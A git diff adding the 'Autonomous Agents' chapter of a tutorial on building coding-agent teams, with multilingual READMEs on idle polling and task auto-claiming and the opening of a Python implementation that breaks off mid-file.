+Deep Dive into CC Source + +> Teaching note: This chapter's idle_poll + auto-claim mechanism is a pedagogical design, demonstrating the core idea of self-organizing agent teams. CC's actual implementation differs but shares the same goal — reducing Lead's manual assignment burden. + +### 1. CC Has No IDLE Loop — Uses idle_notification + +The tutorial's teammates actively poll the task board every 5s during IDLE. CC does the opposite: **teammates don't actively poll; they automatically go idle after completing a round of work**. + +The mechanism (`teammateMailbox.ts`): +1. Teammate completes a round of work (stop_reason != tool_use) +2. Stop hook fires → sends `idle_notification` to Lead +3. Lead receives idle_notification → knows teammate is free +4. Lead can: assign new task / do nothing / request shutdown + +### 2. Task Claiming: useTaskListWatcher + File Locks + +CC's teammates don't need scan_unclaimed_tasks — CC's `useTaskListWatcher` monitors the `.claude/tasks/` directory for changes, automatically notifying teammates when new tasks are created. Teammates see available tasks and call `TaskUpdate` to claim. + +Concurrency safety on claiming: CC uses file locks (`proper-lockfile`) to protect task files. When two teammates try to claim the same task, only the first one to acquire the lock succeeds — the second sees the status has changed. + +### 3. Tutorial vs CC Comparison + +| Dimension | Tutorial (s17) | CC | +|------|-------------|-----| +| Idle detection | Active polling (idle_poll 5s) | Passive notification (idle_notification) | +| Task discovery | scan_unclaimed_tasks | useTaskListWatcher (file monitoring) | +| Concurrency safety | None (teaching simplification) | proper-lockfile file locks | +| Timeout exit | 60s with no new task | No fixed timeout, Lead manually shuts down | +| Identity retention | messages length detection | Context compaction preserves system prompt | + +The tutorial's active polling model is more intuitive (readers easily understand "check every 5s"), but CC's passive notification model is more efficient (no busy-waiting). + +
+ + diff --git a/s17_autonomous_agents/README.ja.md b/s17_autonomous_agents/README.ja.md new file mode 100644 index 000000000..34aedc2e5 --- /dev/null +++ b/s17_autonomous_agents/README.ja.md @@ -0,0 +1,237 @@ +# s17: Autonomous Agents — ボードを見て、自分で認領 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s15 → s16 → `s17` → [s18](../s18_worktree_isolation/) → s19 + +> *"ボードを見て、自分で認領"* — 空き時にポーリング、仕事があれば実行。 +> +> **Harness 層**: 自治 — チームメイトの自己組織化、Lead の割り当て不要。 + +--- + +## 課題 + +レストランの厨房がまた忙しくなった。以前は Lead がウェイターのように、注文を料理人に個別に割り当てていた — 「Alice は宮保鶏丁、Bob は酸菜魚」。10 個の注文があれば、Lead は 10 回 assign する必要がある。Alice が先に終わっても、Lead が次のタスクをくれるのを待つだけ。 + +本物の厨房はそうは動かない。注文は壁に貼られ、料理人は終わったら自分で次を剥がす。中央で分配する人はいない。Lead は注文を貼るだけでいい。 + +s16 のチームメイトは通信もシャットダウンハンドシェイクもできる。しかし各チームメイトは Lead がタスクを割り当てるのを待つ — タスクボードに 10 個の未割り当てタスクがあれば、Lead は 10 回手動で assign する必要がある。**これはスケールしない。** チームメイトは自分でタスクボードを見て、未割り当てのタスクを見つけて認領し、終わったら次を探すべきだ。 + +--- + +## ソリューション + +![Autonomous Agents Overview](images/autonomous-agents-overview.ja.svg) + +s16 の全機能を保持(MessageBus、プロトコル、シャットダウンハンドシェイク、計画承認)。3 つの追加:**idle_poll**(空き時に 5 秒ごとにポーリング)、**scan_unclaimed_tasks**(ボード上の未認領タスクをスキャン)、**自動認領**(タスクを見つけたら claim、Lead の関与不要)。 + +チームメイトのライフサイクルが 2 フェーズから 3 フェーズに: + +| フェーズ | 挙動 | 終了条件 | +|------|------|---------| +| WORK | inbox → LLM → ツールループ | `stop_reason != tool_use` | +| IDLE | 5 秒ごとに inbox + タスクボードをポーリング | 60 秒タイムアウト | +| SHUTDOWN | summary を送信して終了 | — | + +--- + +## 仕組み + +### idle_poll: 空き時ポーリング + +チームメイトはタスク完了後も終了せず、IDLE フェーズに入る — 5 秒ごとに新しい仕事がないかチェック: + +```python +IDLE_POLL_INTERVAL = 5 # seconds +IDLE_TIMEOUT = 60 # seconds + +def idle_poll(agent_name, messages, name, role) -> bool: + """Poll for 60s. Return True if work found, False if timeout.""" + for _ in range(IDLE_TIMEOUT // IDLE_POLL_INTERVAL): # 12 回 + time.sleep(IDLE_POLL_INTERVAL) + + # ① inbox をチェック + inbox = BUS.read_inbox(agent_name) + if inbox: + messages.append({"role": "user", + "content": f"{json.dumps(inbox)}"}) + return True + + # ② タスクボードをスキャン + unclaimed = scan_unclaimed_tasks() + if unclaimed: + task = unclaimed[0] + claim_task(task["id"], agent_name) + messages.append({"role": "user", + "content": f"Task {task['id']}: " + f"{task['subject']}"}) + return True + + return False # 60 秒タイムアウト → SHUTDOWN +``` + +2 つのチェックは優先度順:inbox が先(shutdown_request などのプロトコルメッセージが含まれる可能性)、タスクボードが次。どちらかが仕事を見つけたら `True` を返し、WORK フェーズに戻る。 + +### scan_unclaimed_tasks: タスクボードのスキャン + +pending 状態、owner なし、依存関係によるブロックなしのタスクを見つける: + +```python +def scan_unclaimed_tasks() -> list[dict]: + unclaimed = [] + for f in sorted(TASKS_DIR.glob("task_*.json")): + task = json.loads(f.read_text()) + if (task.get("status") == "pending" + and not task.get("owner") + and not task.get("blockedBy")): + unclaimed.append(task) + return unclaimed +``` + +3 つの条件が全て必要:pending であること(in_progress や completed ではない)、owner がないこと(誰も認領していない)、blockedBy がないこと(他のタスクにブロックされていない)。チュートリアル版はファイル名順で最初のものを取得、CC はファイルロックで複数チームメイトの同時認領を防止。 + +### チームメイトライフサイクル: WORK → IDLE → SHUTDOWN + +s16 のチームメイトはタスク完了後に終了していた。s17 は IDLE フェーズを追加 — 外側ループで WORK → IDLE を繰り返す: + +```python +# 外側ループ: WORK → IDLE サイクル +while True: + # WORK フェーズ: 内側ループ(最大 10 ラウンド LLM 呼び出し) + for _ in range(10): + # inbox チェック、プロトコルメッセージ処理、LLM 呼び出し、ツール実行 + ... + if response.stop_reason != "tool_use": + break # WORK フェーズ終了 + + # IDLE フェーズ + found_work = idle_poll(name, messages, name, role) + if not found_work: + break # 60 秒タイムアウト → SHUTDOWN + +# SHUTDOWN: Lead に summary を送信 +BUS.send(name, "lead", summary, "result") +``` + +主要設計: +- **外側 while True**:WORK と IDLE をタイムアウトまで交互に実行 +- **内側 for 10**:WORK フェーズは最大 10 ラウンド LLM 呼び出し(無限ループ防止) +- **IDLE タイムアウト 60 秒**:12 回ポーリング × 5 秒 = 60 秒。タイムアウト後 summary を送信して終了 +- **shutdown_request でいつでも中断可能**:WORK 中でも inbox で shutdown_request を受信したら即座に停止 + +### アイデンティティ再注入 + +autoCompact(s08)の後、チームメイトの messages リストが要約に圧縮されることがある。チームメイトが「自分が誰か忘れる」— 名前と役割がわからなくなる。新しい WORK フェーズに入るたびにチェック: + +```python +if len(messages) <= 3: + messages.insert(0, {"role": "user", + "content": f"You are '{name}', role: {role}. " + f"Continue your work."}) +``` + +メッセージが短すぎる場合、圧縮が発生したことを意味し、アイデンティティ情報を再注入。これは防御的チェック — 本物の CC では context compaction が system prompt を保持するが、チュートリアル版の簡略実装では手動処理が必要。 + +### 組み合わせて実行 + +``` +1. Lead: "バックエンドを構築 — タスクが多すぎる、チームメイトに自分で認領させよう" +2. Lead → create_task("データベース schema を作成") +3. Lead → create_task("API ルートを記述") +4. Lead → create_task("ユニットテストを記述") +5. Lead → spawn_teammate("alice", "backend", "あなたはバックエンド開発者") +6. Lead → spawn_teammate("bob", "backend", "あなたはバックエンド開発者") + +7. alice スレッド起動 → WORK: 初期 inbox なし → 空転 → IDLE +8. bob スレッド起動 → WORK: 初期 inbox なし → 空転 → IDLE + +9. alice IDLE 1 回目のポーリング → scan_unclaimed → "データベース schema を作成" を発見 +10. alice → claim_task → "データベース schema を作成" → WORK に戻る +11. bob IDLE 1 回目のポーリング → scan_unclaimed → "API ルートを記述" を発見 +12. bob → claim_task → "API ルートを記述" → WORK に戻る + +13. alice WORK: write_file("schema.sql", ...) → complete_task → WORK 終了 +14. alice IDLE → scan → "ユニットテストを記述" → claim → WORK +15. alice WORK: write_file("test_api.py", ...) → complete_task → WORK 終了 +16. alice IDLE → 60 秒新タスクなし → SHUTDOWN + +17. bob も同様の流れ → 完了 → SHUTDOWN +18. Lead check_inbox → alice と bob の summary を確認 +``` + +2 人のチームメイトが並行して認領・作業。Lead はタスク作成とチームメイト起動だけ — 手動割り当て不要。 + +--- + +## s16 からの変更 + +| コンポーネント | 変更前 (s16) | 変更後 (s17) | +|--------------|------------|------------| +| タスク割り当て | Lead が手動で assign | チームメイトが自動認領 | +| チームメイト状態 | WORK または終了 | WORK → IDLE(60 秒ポーリング)→ SHUTDOWN | +| 新規関数 | — | idle_poll, scan_unclaimed_tasks | +| アイデンティティ保持 | system prompt のみ | 圧縮後の自動再注入 | +| Lead ツール | 13 | 13(変更なし) | +| チームメイトツール | 5 | 7(+list_tasks, claim_task) | +| チームメイト終了条件 | タスク完了後即終了 | 60 秒新タスクなしで終了 | + +--- + +## 試してみる + +```sh +cd learn-claude-code +python s17_autonomous_agents/code.py +``` + +以下のプロンプトを試してください: + +`Create 3 tasks on the board, then spawn alice and bob. Watch them auto-claim and work.` + +観察ポイント:チームメイトは未割り当てのタスクを自動認領したか?blockedBy 依存順序を守ったか?アイドルタイムアウト後に自動シャットダウンしたか?`.tasks/` ディレクトリのタスク状態はどう変化したか? + +--- + +## 次の章 + +チームメイトが自己組織化した。しかし Alice と Bob は同じディレクトリで作業している — Alice が `config.py` を編集し、Bob も `config.py` を編集して、互いに上書きし合う。 + +s18 Worktree Isolation → 各タスクに独自の作業ディレクトリ、互いに干渉しない。 + +
+CC ソースコード深掘り + +> 教学注記:本章の idle_poll + auto-claim 機構は教学設計であり、自己組織化 Agent チームの核心思想を示している。CC の実際の実装方法は異なるが、目標は同じ — Lead の手動割り当て負担を減らすこと。 + +### 一、CC に IDLE ループはない — idle_notification を使用 + +チュートリアル版のチームメイトは IDLE 中に 5 秒ごとにタスクボードをアクティブにポーリングする。CC は逆:**チームメイトはアクティブにポーリングせず、作業ラウンド完了後に自動的にアイドル状態になる**。 + +具体的な仕組み(`teammateMailbox.ts`): +1. チームメイトが作業ラウンドを完了(stop_reason != tool_use) +2. Stop hook が発火 → Lead に `idle_notification` を送信 +3. Lead が idle_notification を受信 → チームメイトが空いていることを把握 +4. Lead は:新しいタスクを割り当て / 何もしない / シャットダウンを要求 + +### 二、タスク認領:useTaskListWatcher + ファイルロック + +CC のチームメイトは scan_unclaimed_tasks を必要としない — CC の `useTaskListWatcher` が `.claude/tasks/` ディレクトリの変化を監視し、新しいタスクが作成されると自動的にチームメイトに通知。チームメイトは利用可能なタスクを見て `TaskUpdate` を呼んで認領。 + +認領時の並行安全性:CC は `proper-lockfile` でタスクファイルを保護。2 人のチームメイトが同じタスクを同時に認領しようとした場合、最初にロックを取得した方だけが成功し、2 人目は状態が変わったことを確認。 + +### 三、チュートリアル版 vs CC 比較 + +| 次元 | チュートリアル版 (s17) | CC | +|------|-------------|-----| +| アイドル検出 | アクティブポーリング(idle_poll 5s) | パッシブ通知(idle_notification) | +| タスク発見 | scan_unclaimed_tasks | useTaskListWatcher(ファイル監視) | +| 並行安全性 | なし(教学簡略化) | proper-lockfile ファイルロック | +| タイムアウト終了 | 60 秒新タスクなし | 固定タイムアウトなし、Lead が手動でシャットダウン | +| アイデンティティ保持 | messages 長さ検出 | context compaction が system prompt を保持 | + +チュートリアル版のアクティブポーリングモデルはより直感的(読者は「5 秒ごとにチェック」を容易に理解)、しかし CC のパッシブ通知モデルはより効率的(ビジーウェイトなし)。 + +
+ + diff --git a/s17_autonomous_agents/README.md b/s17_autonomous_agents/README.md new file mode 100644 index 000000000..80aff5ee5 --- /dev/null +++ b/s17_autonomous_agents/README.md @@ -0,0 +1,237 @@ +# s17: Autonomous Agents — 自己看板,自己认领 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s15 → s16 → `s17` → [s18](../s18_worktree_isolation/) → s19 + +> *"自己看板,自己认领"* — 空闲时轮询,有活就干。 +> +> **Harness 层**: 自治 — 队友自组织,不依赖 Lead 分配。 + +--- + +## 问题 + +饭店厨房又忙起来了。之前 Lead 像传菜员,逐个给厨师分配订单——"Alice 做宫保鸡丁,Bob 做酸菜鱼"。10 个订单,Lead 得 assign 10 次。如果 Alice 先做完了,她就干等着 Lead 给下一个任务。 + +真正的厨房不是这样运作的。订单贴在墙上,厨师做完一个自己去撕下一个。没有人站在中间分配。Lead 只需要把订单贴上去。 + +s16 的队友能通信、能握手关机。但每个队友等 Lead 分配任务——如果任务看板上有 10 个未认领任务,Lead 得手动 assign 10 次。**这不能扩展。** 队友应该自己看任务看板,发现没人做的任务就认领,做完再找下一个。 + +--- + +## 解决方案 + +![Autonomous Agents Overview](images/autonomous-agents-overview.svg) + +s16 的全部能力保留(MessageBus、协议、关机握手、计划审批)。新增三样:**idle_poll**(空闲时每 5 秒轮询一次)、**scan_unclaimed_tasks**(扫描看板上未认领的任务)、**自动认领**(找到任务就 claim,不用 Lead 操心)。 + +队友生命周期从两阶段变成三阶段: + +| 阶段 | 行为 | 退出条件 | +|------|------|---------| +| WORK | inbox → LLM → 工具循环 | `stop_reason != tool_use` | +| IDLE | 每 5s 轮询 inbox + 任务板 | 60s 超时 | +| SHUTDOWN | 发 summary,退出 | — | + +--- + +## 工作原理 + +### idle_poll: 空闲轮询 + +队友完成当前任务后不退出,进入 IDLE 阶段——每 5 秒检查一次有没有新工作: + +```python +IDLE_POLL_INTERVAL = 5 # seconds +IDLE_TIMEOUT = 60 # seconds + +def idle_poll(agent_name, messages, name, role) -> bool: + """Poll for 60s. Return True if work found, False if timeout.""" + for _ in range(IDLE_TIMEOUT // IDLE_POLL_INTERVAL): # 12 次 + time.sleep(IDLE_POLL_INTERVAL) + + # ① 检查收件箱 + inbox = BUS.read_inbox(agent_name) + if inbox: + messages.append({"role": "user", + "content": f"{json.dumps(inbox)}"}) + return True + + # ② 扫描任务看板 + unclaimed = scan_unclaimed_tasks() + if unclaimed: + task = unclaimed[0] + claim_task(task["id"], agent_name) + messages.append({"role": "user", + "content": f"Task {task['id']}: " + f"{task['subject']}"}) + return True + + return False # 60s 超时 → SHUTDOWN +``` + +两个检查按优先级排列:inbox 优先(可能包含 shutdown_request 等协议消息),任务板其次。任何一路找到工作就返回 `True`,回到 WORK 阶段。 + +### scan_unclaimed_tasks: 扫描任务看板 + +找 pending 状态、无 owner、无依赖阻塞的任务: + +```python +def scan_unclaimed_tasks() -> list[dict]: + unclaimed = [] + for f in sorted(TASKS_DIR.glob("task_*.json")): + task = json.loads(f.read_text()) + if (task.get("status") == "pending" + and not task.get("owner") + and not task.get("blockedBy")): + unclaimed.append(task) + return unclaimed +``` + +三个条件缺一不可:必须是 pending(不是 in_progress 或 completed)、没有 owner(没人认领)、没有 blockedBy(不被其他任务阻塞)。教学版按文件名排序取第一个;CC 用文件锁防止多个队友同时认领同一个任务。 + +### 队友生命周期: WORK → IDLE → SHUTDOWN + +s16 的队友做完任务就退出。s17 加了 IDLE 阶段,队友在外层循环中反复 WORK → IDLE: + +```python +# Outer loop: WORK → IDLE cycle +while True: + # WORK phase: 内层循环(最多 10 轮 LLM 调用) + for _ in range(10): + # 检查 inbox、处理协议消息、调 LLM、执行工具 + ... + if response.stop_reason != "tool_use": + break # WORK 阶段结束 + + # IDLE phase + found_work = idle_poll(name, messages, name, role) + if not found_work: + break # 60s 超时 → SHUTDOWN + +# SHUTDOWN: 发 summary 给 Lead +BUS.send(name, "lead", summary, "result") +``` + +关键设计: +- **外层 while True**:WORK 和 IDLE 交替进行,直到超时 +- **内层 for 10**:WORK 阶段最多 10 轮 LLM 调用(防止无限循环) +- **IDLE 超时 60 秒**:12 次轮询 × 5 秒 = 60 秒。超时后发送 summary 并退出 +- **shutdown_request 随时中断**:即使在 WORK 阶段,inbox 中收到 shutdown_request 也会立即停止 + +### 身份重注入 + +autoCompact(s08)之后,队友的 messages 列表可能被压缩成一段摘要。队友可能"忘了自己是谁"——不知道自己的名字和角色。每次进入新的 WORK 阶段时检查: + +```python +if len(messages) <= 3: + messages.insert(0, {"role": "user", + "content": f"You are '{name}', role: {role}. " + f"Continue your work."}) +``` + +消息过短说明发生了压缩,此时重新注入身份信息。这是一个防御性检查——在真实 CC 中,context compaction 会保留 system prompt,但教学版的简化实现需要手动处理。 + +### 合起来跑 + +``` +1. Lead: "搭建后端——任务太多,让队友自己认领" +2. Lead → create_task("创建数据库 schema") +3. Lead → create_task("写 API 路由") +4. Lead → create_task("写单元测试") +5. Lead → spawn_teammate("alice", "backend", "你是后端开发者") +6. Lead → spawn_teammate("bob", "backend", "你是后端开发者") + +7. alice 线程启动 → WORK: 没有初始 inbox → 空转 → IDLE +8. bob 线程启动 → WORK: 没有初始 inbox → 空转 → IDLE + +9. alice IDLE 第 1 次轮询 → scan_unclaimed → 发现"创建数据库 schema" +10. alice → claim_task → "创建数据库 schema" → 回到 WORK +11. bob IDLE 第 1 次轮询 → scan_unclaimed → 发现"写 API 路由" +12. bob → claim_task → "写 API 路由" → 回到 WORK + +13. alice WORK: write_file("schema.sql", ...) → complete_task → WORK 结束 +14. alice IDLE → scan → "写单元测试" → claim → WORK +15. alice WORK: write_file("test_api.py", ...) → complete_task → WORK 结束 +16. alice IDLE → 60s 无新任务 → SHUTDOWN + +17. bob 类似流程 → 做完 → SHUTDOWN +18. Lead check_inbox → 看到 alice 和 bob 的 summary +``` + +两个队友并行认领、并行工作。Lead 只需要创建任务和启动队友,不需要手动分配。 + +--- + +## 相对 s16 的变更 + +| 组件 | 之前 (s16) | 之后 (s17) | +|------|-----------|-----------| +| 任务分配 | Lead 手动 assign | 队友自动认领 | +| 队友状态 | WORK 或退出 | WORK → IDLE(轮询 60s) → SHUTDOWN | +| 新函数 | — | idle_poll, scan_unclaimed_tasks | +| 身份保持 | 仅 system prompt | 压缩后自动重注入 | +| Lead 工具 | 13 | 13(不变) | +| 队友工具 | 5 | 7(+ list_tasks, claim_task) | +| 队友退出条件 | 完成任务即退出 | 60s 无新任务才退出 | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s17_autonomous_agents/code.py +``` + +试试这个 prompt: + +`Create 3 tasks on the board, then spawn alice and bob. Watch them auto-claim and work.` + +观察重点:队友是否自动认领了未分配的任务?他们是否按 blockedBy 依赖顺序认领?空闲超时后是否自动关机?`.tasks/` 目录下的任务状态如何变化? + +--- + +## 接下来 + +队友自组织了。但 Alice 和 Bob 都在同一个目录下工作——Alice 改 `config.py`,Bob 也改 `config.py`,互相覆盖。 + +s18 Worktree Isolation → 每个任务有自己的工作目录,互不干扰。 + +
+深入 CC 源码 + +> 教学说明:本章的 idle_poll + auto-claim 机制是教学设计,展示自组织 Agent 团队的核心思想。CC 的实际实现方式不同,但目标一致——减少 Lead 的手动分配负担。 + +### 一、CC 没有 IDLE 循环——用 idle_notification + +教学版的队友在 IDLE 阶段每 5 秒主动轮询任务板。CC 的做法相反:**队友不主动轮询,而是完成一轮工作后自动进入空闲**。 + +具体机制(`teammateMailbox.ts`): +1. 队友完成一轮工作(stop_reason != tool_use) +2. Stop hook 触发 → 发 `idle_notification` 给 Lead +3. Lead 收到 idle_notification → 知道队友空闲了 +4. Lead 可以:分配新任务 / 不做任何事 / 请求关机 + +### 二、任务认领:useTaskListWatcher + 文件锁 + +CC 的队友不需要 scan_unclaimed_tasks——CC 的 `useTaskListWatcher` 监听 `.claude/tasks/` 目录变化,当有新任务创建时自动通知队友。队友看到可用任务后调用 `TaskUpdate` 认领。 + +认领时的并发安全:CC 用文件锁(`proper-lockfile`)保护任务文件。两个队友同时认领同一个任务时,只有第一个拿到锁的会成功,第二个会看到状态已变。 + +### 三、教学版 vs CC 对比 + +| 维度 | 教学版 (s17) | CC | +|------|-------------|-----| +| 空闲发现 | 主动轮询(idle_poll 5s) | 被动通知(idle_notification) | +| 任务发现 | scan_unclaimed_tasks | useTaskListWatcher(文件监听) | +| 并发安全 | 无(教学简化) | proper-lockfile 文件锁 | +| 超时退出 | 60s 无新任务 | 无固定超时,Lead 手动 shutdown | +| 身份保持 | messages 长度检测 | context compaction 保留 system prompt | + +教学版的主动轮询模型更直观(读者容易理解"每 5 秒查一次"),但 CC 的被动通知模型更高效(没有空转)。 + +
+ + diff --git a/s17_autonomous_agents/code.py b/s17_autonomous_agents/code.py new file mode 100644 index 000000000..d3667b886 --- /dev/null +++ b/s17_autonomous_agents/code.py @@ -0,0 +1,752 @@ +#!/usr/bin/env python3 +""" +s17: Autonomous Agents — idle poll + auto-claim + WORK/IDLE lifecycle. + +Run: python s17_autonomous_agents/code.py +Need: pip install anthropic python-dotenv + .env with ANTHROPIC_API_KEY + +Changes from s16: + - scan_unclaimed_tasks: find pending, unowned, unblocked tasks + - idle_poll: 60s polling loop (inbox + task board) + - Teammate lifecycle: WORK → IDLE → SHUTDOWN + - Teammate tools: + list_tasks, claim_task (5→7) + - Identity re-injection after context compression + +ASCII lifecycle: + WORK: inbox → LLM → tools → (tool_use? loop) → (done? → IDLE) + IDLE: 5s poll → inbox? → WORK / unclaimed? → claim → WORK / 60s? → SHUTDOWN +""" + +import os, subprocess, json, time, random, threading +from pathlib import Path +from datetime import datetime +from dataclasses import dataclass, asdict, field + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# ── Task System (from s12) ── + +TASKS_DIR = WORKDIR / ".tasks" +TASKS_DIR.mkdir(exist_ok=True) + + +@dataclass +class Task: + id: str + subject: str + description: str + status: str + owner: str | None + blockedBy: list[str] + + +def _task_path(task_id: str) -> Path: + return TASKS_DIR / f"{task_id}.json" + + +def create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> Task: + task = Task( + id=f"task_{int(time.time())}_{random.randint(0, 9999):04d}", + subject=subject, description=description, + status="pending", owner=None, + blockedBy=blockedBy or [], + ) + save_task(task) + return task + + +def save_task(task: Task): + _task_path(task.id).write_text(json.dumps(asdict(task), indent=2)) + + +def load_task(task_id: str) -> Task: + return Task(**json.loads(_task_path(task_id).read_text())) + + +def list_tasks() -> list[Task]: + return [Task(**json.loads(p.read_text())) + for p in sorted(TASKS_DIR.glob("task_*.json"))] + + +def can_start(task_id: str) -> bool: + task = load_task(task_id) + return all(load_task(d).status == "completed" for d in task.blockedBy) + + +def claim_task(task_id: str, owner: str = "agent") -> str: + task = load_task(task_id) + if task.status != "pending": + return f"Task {task_id} is {task.status}, cannot claim" + if not can_start(task_id): + deps = [d for d in task.blockedBy if load_task(d).status != "completed"] + return f"Blocked by: {deps}" + task.owner = owner + task.status = "in_progress" + save_task(task) + print(f" \033[36m[claim] {task.subject} → in_progress\033[0m") + return f"Claimed {task.id} ({task.subject})" + + +def complete_task(task_id: str) -> str: + task = load_task(task_id) + if task.status != "in_progress": + return f"Task {task_id} is {task.status}, cannot complete" + task.status = "completed" + save_task(task) + unblocked = [t.subject for t in list_tasks() + if t.status == "pending" and t.blockedBy and can_start(t.id)] + print(f" \033[32m[complete] {task.subject} ✓\033[0m") + msg = f"Completed {task.id} ({task.subject})" + if unblocked: + msg += f"\nUnblocked: {', '.join(unblocked)}" + return msg + + +# ── Prompt Assembly (from s10) ── + +PROMPT_SECTIONS = { + "identity": "You are a coding agent. Act, don't explain.", + "tools": "Available tools: bash, read, write, edit, glob, " + "create_task, list_tasks, claim_task, complete_task, " + "spawn_teammate, send_message, check_inbox, " + "request_shutdown, submit_plan, review_plan.", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use todo_write first.", + "skills": "Skills are on demand: list_skills → load_skill.", + "team": "You can spawn autonomous teammates. Teammates auto-claim " + "tasks from the board when idle. Use request_shutdown for " + "graceful shutdown, submit_plan/review_plan for plan approval.", + "memory": "Relevant memories are injected below when available.", +} + + +def assemble_system_prompt(context: dict) -> str: + sections = [PROMPT_SECTIONS["identity"], + PROMPT_SECTIONS["tools"], + PROMPT_SECTIONS["workspace"]] + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("has_team"): + sections.append(PROMPT_SECTIONS["team"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + return "\n\n".join(sections) + + +_last_context_hash, _last_prompt = None, None + + +def get_system_prompt(context: dict) -> str: + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash, _last_prompt = h, assemble_system_prompt(context) + return _last_prompt + + +# ── Tools (from s15) ── + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + fp = safe_path(path) + fp.parent.mkdir(parents=True, exist_ok=True) + fp.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +# ── MessageBus (from s15) ── + +MAILBOX_DIR = WORKDIR / ".mailboxes" +MAILBOX_DIR.mkdir(exist_ok=True) + + +class MessageBus: + def send(self, from_agent: str, to_agent: str, content: str, + msg_type: str = "message", metadata: dict = None): + msg = {"from": from_agent, "to": to_agent, + "content": content, "type": msg_type, + "ts": time.time(), "metadata": metadata or {}} + inbox = MAILBOX_DIR / f"{to_agent}.jsonl" + with open(inbox, "a") as f: + f.write(json.dumps(msg) + "\n") + print(f" \033[33m[bus] {from_agent} → {to_agent}: " + f"({msg_type}) {content[:50]}\033[0m") + + def read_inbox(self, agent: str) -> list[dict]: + inbox = MAILBOX_DIR / f"{agent}.jsonl" + if not inbox.exists(): + return [] + msgs = [json.loads(line) for line in inbox.read_text().splitlines() + if line.strip()] + inbox.unlink() + return msgs + + +BUS = MessageBus() +active_teammates: dict[str, bool] = {} + + +# ── Protocol State (from s16) ── + +@dataclass +class ProtocolState: + request_id: str + type: str + sender: str + target: str + status: str + payload: str + created_at: float = field(default_factory=time.time) + + +pending_requests: dict[str, ProtocolState] = {} + + +def new_request_id() -> str: + return f"req_{random.randint(0, 999999):06d}" + + +def match_response(response_type: str, request_id: str, approve: bool): + """Correlate a response to the original request via request_id.""" + state = pending_requests.get(request_id) + if not state: + print(f" \033[31m[protocol] unknown request_id: {request_id}\033[0m") + return + state.status = "approved" if approve else "rejected" + icon = "✓" if approve else "✗" + color = "32" if approve else "31" + print(f" \033[{color}m[protocol] {state.type} {icon} " + f"({request_id}: {state.status})\033[0m") + + +# ── Autonomous Agent (s17 new) ── + +IDLE_POLL_INTERVAL = 5 # seconds +IDLE_TIMEOUT = 60 # seconds + + +def scan_unclaimed_tasks() -> list[dict]: + """Find pending, unowned, unblocked tasks.""" + unclaimed = [] + for f in sorted(TASKS_DIR.glob("task_*.json")): + task = json.loads(f.read_text()) + if (task.get("status") == "pending" + and not task.get("owner") + and not task.get("blockedBy")): + unclaimed.append(task) + return unclaimed + + +def idle_poll(agent_name: str, messages: list, + name: str, role: str) -> bool: + """Poll for 60s. Return True if work found, False if timeout.""" + for _ in range(IDLE_TIMEOUT // IDLE_POLL_INTERVAL): + time.sleep(IDLE_POLL_INTERVAL) + + # Check inbox + inbox = BUS.read_inbox(agent_name) + if inbox: + messages.append({"role": "user", + "content": f"{json.dumps(inbox)}"}) + print(f" \033[36m[idle] {name} found inbox messages\033[0m") + return True + + # Scan task board + unclaimed = scan_unclaimed_tasks() + if unclaimed: + task = unclaimed[0] + claim_task(task["id"], agent_name) + messages.append({"role": "user", + "content": f"Task {task['id']}: " + f"{task['subject']}"}) + print(f" \033[32m[idle] {name} auto-claimed: " + f"{task['subject']}\033[0m") + return True + + print(f" \033[31m[idle] {name} timeout ({IDLE_TIMEOUT}s)\033[0m") + return False + + +# ── Teammate Thread (from s15 + s16 + s17) ── + +def spawn_teammate_thread(name: str, role: str, prompt: str) -> str: + if name in active_teammates: + return f"Teammate '{name}' already exists" + + system = (f"You are '{name}', a {role}. " + f"Use tools to complete tasks. " + f"You can list and claim tasks from the board. " + f"Check inbox for protocol messages.") + + def handle_inbox_message(name: str, msg: dict, messages: list): + """Dispatch incoming protocol messages by type.""" + msg_type = msg.get("type", "message") + meta = msg.get("metadata", {}) + req_id = meta.get("request_id", "") + + if msg_type == "shutdown_request": + BUS.send(name, "lead", "Shutting down gracefully.", + "shutdown_response", + {"request_id": req_id, "approve": True}) + print(f" \033[35m[protocol] {name} approved shutdown " + f"({req_id})\033[0m") + return True + + if msg_type == "plan_approval_response": + approve = meta.get("approve", False) + if approve: + messages.append({"role": "user", + "content": "[Plan approved] Proceed with the task."}) + else: + messages.append({"role": "user", + "content": f"[Plan rejected] Feedback: {msg['content']}"}) + return False + + def run(): + messages = [{"role": "user", "content": prompt}] + sub_tools = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}}, + "required": ["path"]}}, + {"name": "write_file", 